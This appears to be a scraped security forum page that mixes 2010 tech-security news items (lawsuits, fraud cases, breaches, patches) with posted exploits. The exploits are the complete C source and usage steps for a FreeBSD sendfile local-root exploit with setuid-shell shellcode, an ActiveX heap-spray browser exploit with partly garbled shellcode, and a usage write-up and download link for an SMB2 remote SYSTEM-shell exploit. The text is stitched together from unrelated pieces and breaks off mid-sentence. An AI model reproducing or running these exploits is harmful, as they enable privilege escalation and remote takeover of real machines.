Dragos

Baidu, operator of China's largest search engine, is suing domestic security vendor 360 for unfair competition alleging a version of 360's security software flags both Baidu Toolbar and Baidu Address Bar as malware. The software tells users the plugins must be removed, Baidu said. The suit, which was filed late last month, demands that 360 cease with its unfair practices. Baidu is also suing the company for 10 million renminbi (US$1.4 million) and is requesting that 360 issue public apologies on its websites as well as on several major news sites in China. Baidu declined to comment, but confirmed that the suit was accepted by Beijing Second Intermediate People's Court. 360, a major software security provider in China, responded to Baidu's claims in a statement on Friday. The company highlighted how search engines are sites for "swindling" and that they provide avenues for online threats to reach users. "In providing search results, Baidu has made no obligation toward protecting its users. Baidu is not a security company," 360 said. Whether or not Baidu's toolbars were flagged as malware is decided by user vote, the company added. "Baidu should check to see if these two software programs are operating correctly," 360 said. This is not the first time that 360 has faced a lawsuit for unfair competition. In the past, it has also seen trouble with Yahoo China and other domestic companies. 360 was founded by Zhou Hongyi, who was originally the general manager of Yahoo China. Following his departure, Yahoo China sued Zhou's new company in 2006, alleging that 360's security software was identifying Yahoo Toolbar as malware. Yahoo China later won the case. "This is a very old battleground," said Mark Natkin, managing director of Beijing-based Marbridge Consulting. "You will see a plethora of suits between different companies, not just in the anti-virus malware field, but also in types of toolbars. If you install one company's toolbar, it will disable the other company's toolbar." Baidu sues Chinese security company | ITworld

Police raided several locations in London and arrested nine people suspected of being members of a criminal ring, which stole millions of pounds from telecommunications companies. It looks like the ring was part of an international fraud network built around fraudulently acquired iPhones, inside which multiple gangs handled different aspects of the operation. Police investigators claim that a group of West African fraudsters used cloned credit cards and stolen identities to buy iPhones and associated service subscriptions over the Internet. However, instead of being shipped at the addresses specified during purchase, the devices were delivered by corrupt drivers to an individual, who received almost 1,000 fraudulently bought iPhones in this manner. The fraudster was taking the SIM cards out from the devices and was selling them to a gang, made up primarily of Pakistani nationals. This gang was shipping the cards to countries in Middle East, Europe and Asia, where they were being placed inside special auto-dial devices configured to call local premium rate phone lines non-stop. Through this method, the fraudsters managed to steal £1.2 million (over $1.8 million) in July from UK telecom provider O2. The company was paying money instantly to the premium rate numbers operators, but was not being able to recover the funds from customers, who were supposed to own those SIM cards. "Today we have struck at the very heart of a highly sophisticated criminal network that has been targeting the telecommunications industry to steal millions of pounds. "Our investigation found a crime gathering momentum. Each month more Sim cards were being used to make more phone calls to premium rate lines at more expense to the network provider," Detective Superintendent Bob Wishart, of City of London Police, commented for The Daily Telegraph. The SIM-less iPhones were also being sold by a different gang in countries where operators don't block them, for as much as £450 ($700) a piece. During the raids Police found and seized hundreds of SIM cards, tens of new iPhones still in their boxes, cloned credit cards, as well as fake passports. UK Police Dismantles International Telecom Fraud Ring - - Softpedia

A lawmaker has uncovered that 1,715 files containing South Korean military secrets, including war plans against North Korea, were stolen from infected Army-issued computers. Song Young-sun, a member of the South Korean parliament, who sits on the National Defense Committee, asked the Defense Ministry recently to release details about the security breach. According to the information, the leak occurred between January and March this year, when 13 Army officers who were analyzing sensitive data had their computer infected with unspecified malware. Apparently the same threat was used in all cases and there are strong reasons to believe that there was a single source for the attacks. Obviously, South Korea suspects the involvement of its Northern neighbor. According to the military, this is the biggest leak since December 2005, when the country created the CyberSecurity Center to fight against such attacks. Song Young-sun claims that even though the leaked war plans were old and no longer classified as secrets, they still pose a threat to national security. "The war operation plans, regardless of the secret-keeping period, can strike a blow to military operations when it gets into the hands of the enemy," the lawmaker told JoongAng Daily, a local newspaper. "Amid rising tension between the South and the North, the leaking or loss of military secrets by on-duty soldiers can have a serious effect on national security," he added. South Korean officials are worried about the increasing number of such data breach incidents and also the numerous cases where military personnel are intentionally selling secrets. In the past we reported that information stealing malware was found on the computer networks of two major South Korean military equipment manufacturers. One of them, Hyundai Heavy Industries, was tasked with building the country's first AEGIS ships, the King Sejong the Great class of destroyers. Malware Used to Steal South Korean Military Secrets - - Softpedia

Three Kenyan nationals, who defrauded four US states of almost $3.4 million by hijacking payments meant for legit vendors, were sentenced to prison on Thursday. According to a Department of Justice press release, Robert M. Otiso, 36, of Elk River, Minn., was sentenced to 72 months in prison for conspiracy to commit mail and wire fraud; Paramena J. Shikanda, 35, of Minneapolis, was sentenced to 46 months in prison for conspiracy to commit money laundering; and Collins K. Masese, 21, of St. Paul, Minn., was sentenced to nine months in prison for conspiracy to commit money laundering. The three individuals, all of Kenyan nationality, were found guilty of instrumenting a fraud scheme with the purpose of stealing money from several US states. Eventually, the defendants succeeded in diverting a total of $3.379 million from the governments of West Virginia, Kansas, Ohio and the Commonwealth of Massachusetts to their own bank accounts. The operation involved setting up fake companies with names similar to those of large vendors like Deloitte Consulting, Unisys, Accenture or Electronic Data Systems, which provide various services to public and private institutions. The fraudsters then sent direct deposit authorization forms to the governments of numerous states suggesting that payments be made to the bank accounts associated with the rogue companies. Many governments realized that this was a scam, but the four previously mentioned didn't and sent money to the payment hijackers, who wired over $770,000 to Kenya. "Today represents a victory for taxpayers. When the state itself is defrauded, we all suffer," said U.S. Attorney for the Southern District of West Virginia R. Booth Goodwin II. "Money taken from the public treasury is money not available for schools, roads, and police and fire departments. That is why this case was such a priority for my office," he explained. Two other defendants, Michael M. Ochenge, 33, and Albert E. Gunga, 30, both of Minneapolis, have pleaded guilty to conspiracy to commit money laundering in connection to this scheme and will be sentenced next week. Government Payment Hijackers Jailed - - Softpedia

Baga id power_host si vezi.

An industry body representing some of the biggest names in technology has hosted a closed-door meeting to discuss the future of the open internet. Public advocacy groups said such back-room dealings were detrimental. The meeting follows the publication of a controversial plan by Google and Verizon that could allow net providers certain types of internet traffic to be given priority over others. Consumer bodies called those proposals an "internet killer". Last week a crowd of about 100 people marched to Google's headquarters in California to present boxes that they said contained 300,000 signatures upholding the values of net neutrality, a founding principle of the net that states that all web data is treated equally no matter where it comes from. The Google/Verizon plan suggests loopholes for mobile traffic and for some specialised content. Protestors urged the search giant to honour its famed "don't do evil" motto. Premium net The Google/Verizon scheme was announced after the US Federal Communications Commission (FCC) halted its own private sessions with internet companies and broadband providers to thrash out a consensus on the thorny subject of net neutrality. An agreement is central to the government's ambitions to provide high speed net access to every American by 2020. Some internet service providers have said that the rise in internet traffic is putting an ever growing burden on the infrastructure of the net. As a result, they say, they should be able to charge more for heavy internet traffic or users or to carry traffic for bandwidth intensive services such as web video. Some critics have said net neutrality could stifle innovation. On the other side of the debate, campaigners say net neutrality is a central tenant of the internet and guarantees free and open access to all. They argue that watering down the concept of net neutrality would pave the way for a two tiered internet, where the ability to pay would determine what services people could access. 'Openness principles' Amid the present impasse, this latest meeting conducted by the Information Technology Industry Council (ITI) in Washington was held to try and find a way forward. It was said to involve representatives from Verizon, AT&T, Skype, Microsoft, Cisco and the Communications Workers of America. In a statement to BBC News, the Council's president Dean Garfield said that "great progress has been made to develop internet openness principles in recent weeks" but more needed to be done "to ensure cross-sector support and to preserve internet access, innovation and investment. "This new effort will build on that work to arrive at something that can achieve both public and private sector support and strike the balance of encouraging continued innovation and investment in the internet." In a recent interview with the BBC Mr Garfield said he believed the way forward was through a private sector initiative. "All the other solutions are ones that will take a fairly long time to effectuate. Private sector leadership is important here, " said Mr Garfield at the time. Google did not attend but said that it was "an important issue and we support any attempt to move the ball forward". Illegitimate negotiations From the perspective of net neutrality supporters, news of another "set of secret negotiations" is worrying. "Industry talks that don't have any public process or consumer interest are not likely to result in good policy making that promotes the public interest," Aparna Sridhar, policy counsel for Free Press told BBC News. "Developing meaningful open internet rules is a job that is best done at the FCC with full public input from a diverse variety of stakeholders and not limited corporate closed door meetings." That was a view backed by another advocacy group, Media Access Project. "These 'negotiations' are illegitimate," said Andrew Jay Schwartzman, the project's senior vice president. "They do not involve representatives of people who use the internet for free expression and commerce and they lack representation from the infant businesses that depend on an open internet to build the future Ciscos, Microsofts and Skypes." Ms Sridhar of Free Press said the present confusion and ensuing rancour has been exacerbated by the FCC. "Unfortunately there is a bit of a vacuum right now because the Commission hasn't acted so various industry players are taking advantage and stepping in to fill that vacuum." BBC News - Tech industry holds closed door talks on open internet

The VideoLAN project has released version 1.1.3 of its popular VLC Media Player program, which includes a patch for a critical arbitrary code execution vulnerability. VLC is a powerful cross-platform multimedia player capable of playing most media formats natively, without the need of additional codecs. It is open source and distributed under the GNU General Public License. The vulnerability addressed in version 1.1.3 is identified as CVE-2010-2937 and was discovered by security researchers from Fortinet's FortiGuard Labs. It stems from an insufficient input validation in the program's TagLib plugin, which is used to parse ID3v2 tags containing meta-information about media files. In order to exploit this flaw an attacker can trick a user into playing a file with a specially crafted ID3v2 tag, which would trigger a memory corruption error. The VLC developers say that in most scenarios this would only crash the application and result in a denial of service condition. However, VUPEN Security, one of the leading vulnerability research companies, rates the issue as critical and claims that it can also be exploited to execute arbitrary code. "A vulnerability has been identified in VideoLAN VLC, which could be exploited by attackers to cause a denial of service or compromise a vulnerable system. "This issue […] could be exploited by attackers to crash an affected application or execute arbitrary code by tricking a user into opening a malicious media file (e.g. MP3)," the company writes in its advisory on the vulnerability. VLC is available for a variety of platforms, including Windows, Mac, Linux, BSD or Solaris, but the VideoLAN Project only distributes precompiled binaries for Windows and Mac. VLC Media Player versions 1.1.2 down to 0.9.0 are affected by this flaw, so in addition to the new 1.1.3 version, the VLC developers have released patches for versions 1.1.2, 1.1.1, 1.1.0 and 1.0.6 that can be applied manually. VLC Media Player 1.1.3 for Windows can be downloaded from here. VLC Media Player 1.1.3 for Mac can be downloaded from here. Critical Vulnerability Fixed in VLC Media Player - - Softpedia

IDG News Service — The group responsible for managing the Internet's domain name system is asking Demand Media's eNom division for answers following complaints from Internet security groups. ENom, the world's second-largest domain name registrar, came under fire last week in a report from HostExploit, a volunteer-run anti-malware research group. According to HostExploit, eNom is host to an unusually large number of malicious websites and is a preferred domain name registrar for pharmaceutical spammers. ICANN now says that it is looking into the matter, according to Kurt Pritz, senior vice president of services with the Internet Corporation for Assigned Names and Numbers. Typically, ICANN advises people with information on illegal activity to take their complaints to law enforcement. "However, given the serious nature of some of the allegations made in the HostExploit report, we will ask eNom for their response and will follow up as appropriate," Pritz said in a statement, e-mailed to IDG News Service. HostExploit says that some eNom resellers are violating ICANN rules by allowing customers to provide false Whois database information, not following ICANN deletion policy and generally not complying with their obligations as resellers. HostExploit's founder, who identifies himself using the pseudonym Jart Armin for fear of retribution, expects that ICANN will now put pressure on eNom to clean up its act. "I think that's a step in the right direction," he said via instant messaging. "They're not in compliance." According to Armin, scammers are abusing the domain name registration system to make it extremely difficult to locate the domain nameservers used by the bad guys. That, in turn, makes it hard to put illegal networks of hacked, botnet computers out of operation. HostExploit also accuses eNom and its resellers of hosting an abnormally large number of malicious Web pages. Armin said that in terms of the total amount of bad activity, eNom is as bad as McColo. Based in San Jose, California, McColo was a notorious Internet service provider that was taken offline by its upstream service providers two years ago, after HostExploit published a report on the malicious activity on its network. Demand Media declined to comment for this story. HostExploit went public with its complaints about eNom in hopes of pressuring it into cleaning up its networks. ICANN's statement shows that it is getting some pressure, but typically it is the peripheral costs of malicious activity that force ISPs to act, according to Neil Daswani, chief technology officer with security vendor Dasient. "What's happening is the search engines and the browser companies are flagging and in some cases blacklisting websites," he said. Customers then call their service providers to find out what's happening, and dealing with those support calls, and the public relations fallout from public reports, can be expensive. "But basically it generates a support cost," Daswani said. "There's no better motivator in many cases than a financial motivator." Robert McMillan covers computer security and general technology breaking news for The IDG News Service. Follow Robert on Twitter at @bobmcmillan. Robert's e-mail address is robert_mcmillan@idg.com ICANN asks Demand Media for answers after report | ITworld

FreeBSD mbufs() sendfile cache poisoning local privilege escalation exploit that throws a setuid shell in /tmp. Works on 7.x and 8.x builds prior to 12Jul2010. /* freebsd x86/x64 sendfile cache local root xpl v2 by Kingcope 2010 -- should h4x any freebsd 8.* and 7.* prior to 12Jul2010 tampers /bin/sh to contain a shellcode which does ' chmod a+s /tmp/sh chown root /tmp/sh execve /tmp/sh2 ' how to use: terminal 1: $ cp /bin/sh /tmp/sh $ cp /bin/sh /tmp/sh2 $ gcc cache.c -o cache terminal 2: $ nc -l 7030 terminal 1: for i386 arch type: $ ./cache i386 for amd64 arch type: $ ./cache amd64 now wait /bin/sh should be execed by the system as root in ~5 mins then do: $ /tmp/sh # cleanup: # cp -f /tmp/sh2 /bin/sh # enjoy the root shell! */ // this juarez is now private on #darknet -- // http://www.youtube.com/watch?v=JtgInqNNpCI // http://www.youtube.com/watch?v=IdbRWrY4QBI #include <sys/types.h> #include <sys/socket.h> #include <sys/uio.h> #include <fcntl.h> #include <netinet/in.h> #include <sys/select.h> #include <sys/stat.h> #include <strings.h> #include <stdio.h> #include <string.h> #include <err.h> main (int argc, char *argv[]) { int s, f, k2; struct sockaddr_in addr; int flags; char str32[]= "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3" "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f" "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d" "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; char str64[]= "\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68" "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05" "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0" "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89" "\xe7\x57\x52\x48\x89\xe6\x0f\x05"; char buf[10000]; char *p; struct stat sb; int n; fd_set wset; int64_t size; off_t sbytes; off_t sent = 0; int chunk; int arch = 3; if (argc != 2) { printf("define architecture i386 or amd64\n"); return; } if (strcmp(argv[1], "i386") == 0) arch=1; if (strcmp(argv[1], "amd64") == 0) arch=2; if (arch == 3) { printf("define architecture i386 or amd64\n"); return; } s = socket(AF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(7030); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); n = connect(s, (struct sockaddr *)&addr, sizeof (addr)); if (n < 0) warn ("fail to connect"); f = open("/bin/sh", O_RDONLY); if (f<0) warn("fail to open file"); n = fstat(f, &sb); if (n<0) warn("fstat failed"); size = sb.st_size; chunk = 0; flags = fcntl(f, F_GETFL); flags |= O_NONBLOCK; fcntl(f, F_SETFL, flags); while (size > 0) { FD_ZERO(&wset); FD_SET(s, &wset); n = select(f+1, NULL, &wset, NULL, NULL); if (n < 0) continue; if (chunk > 0) { sbytes = 0; if (arch == 1) n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0); if (arch == 2) n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0); if (n < 0) continue; chunk -= sbytes; size -= sbytes; sent += sbytes; continue; } chunk = 2048; memset(buf, '\0', sizeof buf); if (arch == 1) { for (k2=0;k2<256;k2++) { buf[k2] = 0x90; } p = buf; p = p + k2; memcpy(p, str32, sizeof str32); n = k2 + sizeof str32; p = buf; } if (arch == 2) { for (k2=0;k2<100;k2++) { buf[k2] = 0x90; } p = buf; p = p + k2; memcpy(p, str64, sizeof str64); n = k2 + sizeof str64; p = buf; } write(s, p, n); } }

Welcome to RST! Have fun! PS: Nu-i baga in seama pe astia de mai sus.

Wikileaks co-founder Julian Assange responds to a BBC question about why it provides encrypted files for download. (Video: Frontline Club) A novel use of encryption by whistle-blowing website Wikileaks could "challenge the legal system for years to come," according to an influential observer of the hacking community. Emmanuel Goldstein, editor of 2600 The Hacker Quarterly magazine, made his comments in reference to an encrypted file recently posted on the site. Some suspect the file - as yet unopened - contains further sensitive material. It has been reposted around the web and is available for anyone to download. "If you release it in encrypted form, nobody really knows if you've released it or not - or even what the material is," Mr Goldstein told BBC News. "Then, if something happens to you, all it takes is the revelation of a simple spoken phrase known by a select group of people and everyone who has this mystery file now has all of the secrets." 'Uncrackable file' Wikileaks recently published 76,000 secret US military logs detailing military actions in Afghanistan; an act the US authorities described as highly irresponsible. The website now says it will release 15,000 further sensitive documents, once it has completed a review aimed at minimising the risk that the release could put people's lives in danger. The site came under criticism after it released the first tranche for endangering the lives of informants or others named in the documents. The release of the logs has led many to wonder what action the US might take against Wikileaks. Now it seems the site may be using encryption as insurance against legal and other threats to the information it holds. The insurance.aes256 file has been posted alongside the already published leaked war logs and can be downloaded by anyone. From the file name, it is believed that it has been encrypted using the AES256 algorithm - described as "extremely strong" by Professor Whitfield Diffie, of the Information Security Group at Royal Holloway University, London. Prof Diffie believes that AES256, which he says has been "extensively studied" could prove too tough even for US intelligence agencies to break. While no-one knows what the insurance file contains, this has not prevented the contents becoming a matter of considerable speculation. Some suspect that the file contains a further leaked US military video, others that it is another tranche of US military logs - perhaps this time from Iraq. Or it could just be an imaginative bluff. Even the name of the directory in which it is held - "straw-glass-and-bottle" - has prompted discussion and debate online. 'Historical value' Speaking at a recent event at London's Frontline Club, Wikileaks founder Julian Assange told attendees how the use of encryption could help overcome legal efforts to prevent publication. Mr Assange told the BBC that Wikileaks had often distributed encrypted material among its members in order to protect it. "We have over a long period of time distributed encrypted backups of material we have yet to release," he told the gathering. "All we have to do is release the password to that material and it is instantly available," he said. By publishing the encrypted documents publicly, Mr Assange said Wikileaks was protecting material of historical value. "That duty to history is something that weighs heavily with us. If you had the Stasi archive in your pocket, that is a very heavy pocket indeed," he said. "We take precautions to make sure that sort of material is not going to disappear from history regardless of the sort of threats to this organisation." Intelligence test But with the "insurance file" Wikileaks has taken the unusual step of making an encrypted backup - if that is indeed what it is - publicly available online. Emanuel Goldstein told the BBC: "Julian is smart. He always has a backup, which is the rule of thumb in this community." But he believes this goes further than just a need to preserve information. "It's a fascinating tactic and one which will challenge the legal system for years to come." In Mr Goldstein's view, any attempt now to seize or prevent publication of material held by Wikileaks will be self-defeating because thousands of copies will already have been distributed world wide. It is, he says, "a tactic of intelligence to ward off the inevitable clampdown." But Cindy Cohn, legal director of the Electronic Frontier Foundation is less convinced the file represents a challenge to the US government. "I don't see it as a challenge, as much as being open about what's going on," she told the BBC. In Ms Cohn's view the idea of circulating encrypted copies of information to keep it safe is well-established. The tactic, according to Ms Cohn, has been used in the past by human rights groups and other organisations. She points to projects like Freenet, which use encryption and wide distribution of data to resist censorship. "Wikileaks is doing the same basic thing in a more directly political context and using encryption to allow them to be more open about it on the front end." For Prof Diffie, the release of information in this way does open up interesting possibilities. "In a sense communications networks can be defined entirely by who has cryptographic keys, and I think a lot of networks will work that way in the future." That's a view which will not be good news for those trying to prevent groups sharing and publishing leaked material. "I think that the people who are trying to shut down Wikileaks are going to have to accept this as a fact of reality that cryptography allows you to do this kind of thing," http://www.bbc.co.uk/news/technology-11026659

The Linux kernel has finally been purged of a privilege-escalation vulnerability that for at least half a decade allowed untrusted local users to gain unfettered rights to the operating system's most secure locations. Maintainers of the central Linux component issued a patch last week that killed the bug, which allowed unprivileged users to gain root access. While Linux overlords stopped short of declaring it a security vulnerability, they stressed that the patch should be installed as soon as possible. “I'm tired of people trying to parse my words like I'm the Federal Reserve Chairman, just go update already,” developer Greg Kroah-Hartman said here. The vulnerability was described as long ago as 2005 by researcher Gael Delalleu, but it remained largely overlooked until Rafal Wojtczuk, a researcher at Invisible Things Lab, started investigating related issues. In a PDF paper published Tuesday, he outlined a method that exploits the underlying bug using the Xorg server, which is instrumental in providing graphical user interface functions in Linux and is also referred to as the X server. “One important aspect the attack demonstrates, is how difficult it is to bring security to a desktop platform, where one of the biggest challenges is to let applications talk to the GUI layer (e.g., X server in case of Linux), which usually involves a very fat GUI protocol (think X protocol, or Win32 GUI API) and a very complex GUI server, but at the same time keep things secure,” Joanna Rutkowska, a fellow security researcher at Invisible Things Lab blogged. The memory-corruption bug stems from two memory regions of the X server that grow in the opposite directions in the address space, an attribute inherited from the x86 architecture designed by Intel. Attackers can force the two regions to collide, causing critical control data to be replaced with values that allow the X server to be hijacked. The bulletin accompanying the kernel fix described the implementation of “a guard page below a grow-down stack segment.” It's a fairly exotic exploit, and can only be used locally, unless combined with an unrelated vulnerability. Still, its ability to remain unrepaired in the kernel for more than five years challenges the contention among many Linux boosters that the open-source platform is more secure because anyone can examine its source code. The lesson here is that the ability to do so doesn't guarantee that anyone will, even when they have the kind of generous guidance provided by Delalleu. To be fair, some Linux distributions appear to have issued updates that closed the hole. SUSE Enterprise 9, 10, and 11 and some versions of openSUSE aren't vulnerable, according to H-Security, which said the SUSE security team issued a fix for the issue in 2004. But that only begs the question why such a fix was never incorporated in the kernel. Linux kernel purged of five-year-old root access bug ? The Register

About 200 Windows applications are vulnerable to remote code-execution attacks that exploit a bug in the way the programs load binary files for the Microsoft operating system, a security researcher said Thursday. The critical vulnerability, which has already been patched in Apple's iTunes media player for Windows and VMware Tools, will be especially challenging to fix, because each application will ultimately need to receive its own patch, Mitja Kolsek, CEO of application security consultancy Acros Security, told The Register. He agreed with fellow researcher H D Moore, who on Wednesday said the critical vulnerability is trivial to exploit. At the time, Moore estimated 40 programs were vulnerable, but security experts from Slovenia-based Acros have found that about 200 of the 220 applications they've tested so far suffer from what they're calling the binary-planting bug. They have yet to complete their inquiry. “We are expecting that there should be many more,” Kolsek said. “We were just looking for those vulnerabilities that were exploitable in terms of the user double-clicking a document or doing a couple of things with the menu.” Acros researchers alerted Microsoft to the vulnerability about four months ago and have been working with members of its security team since then to coordinate a fix with the many affected parties. They had been working in secret until Wednesday, when word of the bug first leaked out, he said. He said Microsoft may be able to release some sort of temporary fix while something more permanent is pending. On Wednesday evening, a Microsoft spokeswoman said the company was investigating the report and would release more details when the inquiry was completed. This article will be updated if Microsoft has anything new to say. The only other software known to be affected is one or more components in Windows. Both Moore and Kolsek have declined to provide further details, except for a Twitter from post from Moore that said the vulnerability may been reported, in part, 10 years ago. Moore also tweeted that additional information would come on Monday. So far, what's known about the vulnerability comes mostly from an advisory Acros issued for the iTunes patch. The bug allows attackers to execute malicious code on Windows machines by getting the media player to open a file located on the same network share as a maliciously designed DLL file, it said. In some cases, the bugs can be exploited to execute EXE files and other types of binaries, as well, Kolsek said. Until a fix is in place users can lessen their exposure by blocking outbound SMB connections on ports 445 and 139 and on WebDAV, but Kolsek, reiterated that will do nothing to prevent attacks that originate on local networks, and that can be a problem in large organizations, where compromises of one machine can be used as a jumping-off point to infect other PCs or workstations. “To own a single computer inside a network is very easy,” he said. “This type of vulnerability would make it really easy to get from this computer to owning some more interesting computers, for example, those belonging to admins. The external firewall would obviously not stop that.” Researcher: Code-execution bug affects 200 Windows apps ? The Register

Probabil e de la PowerHost.

<html> <br></br> <br>. . . \ / </br> <br>|\/| _. _| ** >< </br> <br>| |(_](_] ||/ \ </br> <br> ._| </br> <br></br> <br>RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)</br> <br>By : MadjiX , Dz8(a)Hotmail.com</br> <br>Discovered by Blake: [url=http://www.exploit-db.com/exploits/14309/]RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow[/url] <br>Greetings: His0k4 , Bibi-info , The g0bl!n (y) , sec4ever.com</br> <br>Tested on Windows Xp Sp3 (Fr),with IE6</br> <object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target' ></object> <script> sh = unescape('%uc931???????'+ '??????????'+ '?????????'+ '??????????'+ '??????????'+ '??????????'+ '??????????'+ '??????????'); n=unescape('??'); h = 20; s= h + sh.length; while(n.length<s) n+=n; f=n.substring(0,s); b=n.substring(0,n.length-s); while(b.length+s<0x40000) b=b+b+f; memory=new Array(); for( counter=0; counter<250; counter++) memory[counter]= b + sh; ret=''; for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a"); target.OpenFile(ret); </script> </html>

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference --------------------------------------------------------------------- Exploited by Piotr Bania // [: www.piotrbania.com :] Exploit for Vista SP2/SP1 only, should be reliable! Tested on: Vista sp2 (6.0.6002.18005) Vista sp1 ultimate (6.0.6001.18000) Kudos for: Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace. Special kudos for prdelka for testing this shit and all the hosters. Sample usage ------------ > smb2_exploit.exe 192.167.0.5 45 0 > telnet 192.167.0.5 28876 Microsoft Windows [Version 6.0.6001] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32> When all is done it should spawn a port TARGET_IP:28876 RELEASE UPDATE 08/2010: ---------------------- This exploit was created almost a year ago and wasnt modified from that time whatsoever. The vulnerability itself is patched for a long time already so i have decided to release this little exploit. You use it for your own responsibility and im not responsible for any potential damage this thing can cause. Finally i don't care whether it worked for you or not. P.S the technique itself is described here: Metasploit: SMB2: 351 Packets from the Trampoline =========================================================================== Download: http://www.exploit-db.com/sploits/smb2_exploit_release.zip

Young people may one day have to change their names in order to escape their previous online activity, Google boss Eric Schmidt has warned. Mr Schmidt told the Wall Street Journal he feared they did not understand the consequences of having so much personal information about them online. The firm has been busy bolstering its social networking presence recently. Google has acquired Slide and Jambool, two firms specialising in providing services for social networks. Slide is a gaming firm, whilst Jambool provides virtual currencies and payments. Google has also reportedly invested in another social network gaming firm called Zynga. Many believe the acquisitions are a sign that the search giant is about to launch another social network. Some commentators have already given the rumoured product a name: Google.me. It already owns two other social networks; Google Buzz, launched in February 2010 and its first foray known as Orkut. Buzz proved controversial when it linked up with people's Gmail accounts without asking their consent, meaning that their contacts were publicly visible. Young folly On his prediction that people may change their names, Mr Schmidt said: "I don't believe society understands what happens when everything is available, knowable and recorded by everyone all the time... I mean we really have to think about these things as a society." However, Mr Schmidt said that Google would likely store more personal information about its users in the future. At the moment, he said, "we know roughly who you are, roughly what you care about, roughly who your friends are." But, according to some experts, his concerns about the future are "overstated". "The idea that everything is stored online is not true," social media consultant Suw Charman-Anderson told BBC News. "It will be quite some time before that can become true because of the enormity of the internet." Archives such as Google Cache, which store older versions of websites, are selective, she added. "Google Cache is a snapshot taken periodically of some of the internet. It's very hit and miss at the moment." While companies specialising in "cleaning up" internet profiles already exist, Ms Charman-Anderson argued that social attitudes towards personal content on the web needed to change instead. "There's always a lag between the introduction of new technology and the development of a set of social norms around the behaviour that the technology encourages," she said. "As a society, we are just going have to become a bit more forgiving of the follies of youth." BBC News - Google boss Eric Schmidt warns on social use of media

The world's biggest chip maker, Intel, has agreed to buy the security technology firm, McAfee. Intel will pay $7.68bn (£5bn) in cash. Under the terms of the deal, Intel said it would pay $48 per share in cash for McAfee, almost 60% higher than its closing price on Wednesday. Through buying McAfee, a leading security technology firm, Intel intends to build security features into its microprocessors which go into products such as laptops and phones. The two companies said they had been working together for 18 months and that, should the takeover pass regulatory and shareholder approval, the first new products would be revealed early next year. Both boards of directors have unanimously approved the deal. However, the announcement took many analysts by surprise and sent McAfee's shares 58% higher to 47.21 US cents, close to the proposed purchase price. Intel shares, meanwhile, fell by almost 4% to 18.84 US cents. The deal is likely to reduce Intel's net earnings slightly in the first year. An Intel company statement said that the acquisition reflected that security was now a fundamental component of online computing. It added that today's security approach did not fully address the billions of new internet-ready devices, including mobile and wireless devices, TVs, cars, medical devices and cash machines. A key worry for technology users is the security threat posed by the fast-growing field of cloud computing - the ability to access, change and interact with data on any platform with a net connection, including smartphones. These online services require no software purchase and installation and most run via a browser, but there are concerns that storing personal data on a server somewhere in cyberspace could pose a major threat to the privacy of individuals. The president and chief executive of Intel, Paul Otellini, said in the past, energy efficiency and connectivity had defined computing requirements. In future security would become the "third pillar" that people demanded, he said. McAfee's president and chief executive, Dave DeWalt, said cyber attacks were a growing menace. He said: "The cyber threat landscape has changed dramatically over the past few years with millions of new threats appearing every month." McAfee, also based in Santa Clara, is one of the world's largest security technology companies with about $2bn in revenue last year. BBC News - Intel in $7.68bn McAfee takeover

The UK's Human Genetics Commission website was hit by politically-motivated hackers on Tuesday, who defaced the site with a protest marking a Western plot to overthrow a post-WWII democratically elected leader in Iran. Dr Mohammed Mossadegh nationalised Iran's petroleum industry before a plot backed by the UK and the US led to his overthrow back in 1953. Quite why the Sun Army defaced the Human Genetics Commission website with digital graffiti is not immediately clear, but Jason Hart - senior European VP of CryptoCard, the security firm that brought the hack to our attention - said that in "order to deface the site they [the hackers] would have had to get admin access". Iran is something of a hotbed for politically-motivated hack attacks. The Iranian Cyber Army mounted a series of DNS hijacking attacks against first Twitter and later Chinese search engine Baidu in December 2009 and January. The attacks both resulted in the redirection of surfers. Baidu is suing US-based domain registrar Register.com (no relation) for alleged negligence in facilitating the attacks. Following the attack, the Human Genetics Commission website was restored to normal operation by Wednesday afternoon. The organisation has thus been able to return to its normal business of advising the UK government on the ethical implications and possible social effects of advances in genetics, such as genetic testing, cloning and stem cell research. Iranian activists deface UK genetics website ? The Register

Mozilla announced that it doesn't plan to fix an alleged bug disclosed recently regarding Firefox not triggering a warning when a particular obfuscation technique is used for URLs loaded in IFrames. Two days ago a security researcher from Web security solutions vendor Armorize Technologies, named Aditya K Sood, revealed in a post on the company's blog what he called a "Mozilla Firefox Bug." The issue described by Sood refers to the way Firefox handles certain obfuscated URLs in IFrames. Whenever an URL of the form www.site.com@evil.com is loaded in the address bar, the browser prompts a confirmation dialog, letting the user know that the website they are accessing is evil.com and not site.com. This simple obfuscation technique was commonly used in social engineering attacks, like phishing, a few years ago, prompting Mozilla to introduce the warning. The Armorize researcher points out that this behavior doesn't also apply when URLs are loaded inside IFrames and according to him "In certain cases, it can be used effectively in spreading malware and stealing sensitive information." However, Mozilla and other security experts disagree. "We are aware of the discussion. There is currently no fix in plan since Mozilla does not believe this can be used to attack users," Johnathan Nightingale, director of Firefox development, announced on the Mozilla Security blog. The argument is that users do not actually see the URLs loaded in IFrames, unless explicitly looking at the source code of the page. Therefore, there is no reason for an attacker to 